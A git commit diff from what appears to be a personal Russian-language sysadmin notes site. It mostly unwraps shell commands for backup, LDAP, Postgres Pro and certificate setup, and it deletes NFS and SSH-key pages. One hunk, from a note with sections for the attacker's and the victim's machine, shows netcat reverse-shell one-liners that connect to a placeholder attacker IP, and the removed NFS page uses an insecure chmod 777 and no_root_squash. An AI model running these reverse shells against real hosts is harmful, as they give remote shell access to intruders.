mirror of
https://github.com/fruworg/fruworg.github.io.git
synced 2024-11-16 09:27:17 +03:00
cleaned
This commit is contained in:
parent
12c2b652f0
commit
500c76271b
@ -41,7 +41,7 @@ DEBIAN_FRONTEND=noninteractive apt-get install -q -y aldpro-mp
|
||||
|
||||
## Развёртывание
|
||||
После того, как команда развёртывания отработает и сервер перезагрузитcя,
|
||||
сервер ALD Pro будет доступен по адресу: https://\<dc-name\>.\<domain\>
|
||||
сервер ALD Pro будет доступен по адресу: `https://<dc-name>.<domain>`
|
||||
|
||||
```shell
|
||||
/opt/rbta/aldpro/mp/bin/aldpro-server-install.sh \
|
||||
|
@ -24,7 +24,7 @@ systemctl enable --now postgresql bareos-director bareos-filedaemon bareos-stora
|
||||
```
|
||||
|
||||
### Создание пользователя для Bareos-webui и конфига клиента
|
||||
Веб Bareos'а находится по адресу: [http://\<bareos-ip\>/bareos-webui/](http://localhost/bareos-webui/)
|
||||
Веб Bareos'а находится по адресу: `http://<bareos-ip>/bareos-webui/`
|
||||
```shell
|
||||
bconsole
|
||||
configure add console name=<web-user> password=<web-pass> profile=webui-admin tlsenable=no
|
||||
@ -60,8 +60,7 @@ apt install bareos-filedaemon
|
||||
|
||||
### Перенос конфига с сервера на клиент
|
||||
```shell
|
||||
scp <user>@<server-ip>:/etc/bareos/bareos-dir-export/client\
|
||||
/<client-name>/bareos-fd.d/director/bareos-dir.conf/etc/bareos/bareos-fd.d/director/
|
||||
scp <user>@<server-ip>:/etc/bareos/bareos-dir-export/client /<client-name>/bareos-fd.d/director/bareos-dir.conf/etc/bareos/bareos-fd.d/director/
|
||||
```
|
||||
|
||||
### Включение сервиса
|
||||
|
@ -37,6 +37,5 @@ mount -a
|
||||
|
||||
## Монтирование ручками (необязательно)
|
||||
```shell
|
||||
mount -t cifs //<address> /<folder> -o \
|
||||
username=<username>,password=<password>,domain=<domain>
|
||||
mount -t cifs //<address> /<folder> -o username=<username>,password=<password>,domain=<domain>
|
||||
```
|
||||
|
@ -1,42 +0,0 @@
|
||||
---
|
||||
title: Конфигурация NFS-сервера на Linux
|
||||
description: И его монтирование на клиентах
|
||||
date: 2022-11-25T85:08:00+05:00
|
||||
tags: [vmware]
|
||||
---
|
||||
## Настройка NFS-сервера
|
||||
|
||||
### Установка пакета
|
||||
```shell
|
||||
apt install nfs-kernel-server
|
||||
```
|
||||
|
||||
### Создание каталога, который будет расшарен
|
||||
```shell
|
||||
sudo mkdir /nfs
|
||||
sudo chmod 777 /nfs
|
||||
```
|
||||
|
||||
### Разрешаем сетевой доступ
|
||||
```shell
|
||||
/nfs <client-ip>(rw,sync,no_root_squash,no_subtree_check)
|
||||
|
||||
# /etc/exports
|
||||
```
|
||||
|
||||
## Настройка NFS-клиента
|
||||
|
||||
### Установка пакета
|
||||
```shell
|
||||
apt install nfs-common
|
||||
```
|
||||
|
||||
### Запуск службы
|
||||
``` shell
|
||||
systemctl enable --now rpcbind
|
||||
```
|
||||
|
||||
### Автомонитрование
|
||||
```shell
|
||||
<server-ip>:/nfs /nfs nfs defaults 0 0
|
||||
```
|
@ -1,15 +0,0 @@
|
||||
---
|
||||
title: pg_probackup
|
||||
description: Backup Postgres Pro
|
||||
date: 2022-12-14T12:04:00+05:00
|
||||
tags: [linux, postgres]
|
||||
---
|
||||
## Генерируем ключ
|
||||
```shell
|
||||
ssh-keygen
|
||||
```
|
||||
|
||||
## Копируем ключ
|
||||
```shell
|
||||
ssh-copy-id <username>@<server-ip>
|
||||
```
|
@ -1,15 +0,0 @@
|
||||
---
|
||||
title: pg_probackup
|
||||
description: убличного ключа
|
||||
date: 2022-12-14T12:04:00+05:00
|
||||
tags: [linux, ssh]
|
||||
---
|
||||
## Генерируем ключ
|
||||
```shell
|
||||
ssh-keygen
|
||||
```
|
||||
|
||||
## Копируем ключ
|
||||
```shell
|
||||
ssh-copy-id <username>@<server-ip>
|
||||
```
|
@ -30,8 +30,7 @@ URI ldaps://<dc>.<domain>.<local>:636
|
||||
|
||||
## Проверка ldap
|
||||
```shell
|
||||
ldapsearch -x -b "dc=<domain>,dc=<local>" \
|
||||
-H ldaps://<dc>.<domain>.<local>:636 -W -D <domain-user>
|
||||
ldapsearch -x -b "dc=<domain>,dc=<local>" -H ldaps://<dc>.<domain>.<local>:636 -W -D <domain-user>
|
||||
```
|
||||
|
||||
## Правка pg_hba.conf
|
||||
|
@ -8,8 +8,7 @@ tags: [linux, astra, postgres]
|
||||
``` shell
|
||||
apt -y install gnupg
|
||||
wget -O - http://repo.postgrespro.ru/keys/GPG-KEY-POSTGRESPRO | apt-key add -
|
||||
echo "deb http://repo.postgrespro.ru/pgpro-14/astra-smolensk/1.7 1.7_x86-64 main" \
|
||||
> /etc/apt/sources.list.d/pgpro.list
|
||||
echo "deb http://repo.postgrespro.ru/pgpro-14/astra-smolensk/1.7 1.7_x86-64 main" > /etc/apt/sources.list.d/pgpro.list
|
||||
```
|
||||
## Установка пакета
|
||||
```shell
|
||||
|
@ -51,8 +51,7 @@ systemctl restart postgres
|
||||
#### Выгрузка файлов с master
|
||||
```shell
|
||||
rm -rf /var/lib/pgpro/std-13/data/*
|
||||
pg_basebackup -P -R -X stream -c fast -h <master-ip> -U postgres -D \
|
||||
/var/lib/pgpro/std-13/data
|
||||
pg_basebackup -P -R -X stream -c fast -h <master-ip> -U postgres -D /var/lib/pgpro/std-13/data
|
||||
```
|
||||
|
||||
## Репликация с архивом
|
||||
|
@ -15,6 +15,5 @@ nc <attacker-ip> <port> -e /bin/bash
|
||||
|
||||
## Машина жертвы (OpenBSD Netcat)
|
||||
```shell
|
||||
mkfifo /tmp/rev; nc <attacker-ip> <port> < /tmp/rev \
|
||||
| /bin/bash 2>&1 | tee /tmp/rev > /dev/null
|
||||
mkfifo /tmp/rev; nc <attacker-ip> <port> < /tmp/rev | /bin/bash 2>&1 | tee /tmp/rev > /dev/null
|
||||
```
|
||||
|
@ -17,8 +17,7 @@ tags: [linux, ruby, gcc]
|
||||
## Установка пакетов для сборки (и не только)
|
||||
|
||||
```shell
|
||||
apt -y install wget unzip gcc make autoconf \
|
||||
squashfs-tools libtool bison gnupg
|
||||
apt -y install wget unzip gcc make autoconf squashfs-tools libtool bison gnupg
|
||||
```
|
||||
|
||||
## Установка ruby (из пакета)
|
||||
@ -57,8 +56,7 @@ chmod +x /usr/local/bin/rubyc
|
||||
## Установка rubyc (stable, 2.4, не рекомендую)
|
||||
|
||||
```shell
|
||||
wget -P /tmp https://gw.alipayobjects.com/os/enclose-prod\
|
||||
/1fd23e6b-d48f-4ed0-94dd-f0f539960253/rubyc-v0.4.0-linux-x64.gz
|
||||
wget -P /tmp https://gw.alipayobjects.com/os/enclose-prod/1fd23e6b-d48f-4ed0-94dd-f0f539960253/rubyc-v0.4.0-linux-x64.gz
|
||||
gzip -d /tmp/rubyc-v0.4.0-linux-x64.gz
|
||||
mv /tmp/rubyc-v0.4.0-linux-x64 /usr/local/bin/rubyc
|
||||
chmod +x /usr/local/bin/rubyc
|
||||
|
@ -6,8 +6,7 @@ tags: [linux, astra, alt, tls]
|
||||
---
|
||||
## Получение корневого сертификата
|
||||
```shell
|
||||
echo quit | openssl s_client -showcerts \
|
||||
-servername <websi.te> -connect <websi.te>:443 > <certificate>.pem
|
||||
echo quit | openssl s_client -showcerts -servername <websi.te> -connect <websi.te>:443 > <certificate>.pem
|
||||
```
|
||||
|
||||
## Astra Linux
|
||||
|
Loading…
Reference in New Issue
Block a user